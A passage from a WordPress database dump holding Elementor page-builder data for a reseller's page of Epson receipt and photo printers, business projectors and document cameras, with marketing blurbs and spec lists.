]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"77\",\"right\":\"77\",\"bottom\":\"77\",\"left\":\"77\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7867,3467,'_elementor_version','2.5.14'),(7870,3468,'_wp_page_template','template-fullwidth.php'),(7871,3468,'_elementor_edit_mode','builder'),(7872,3468,'_elementor_template_type','post'),(7873,3468,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" 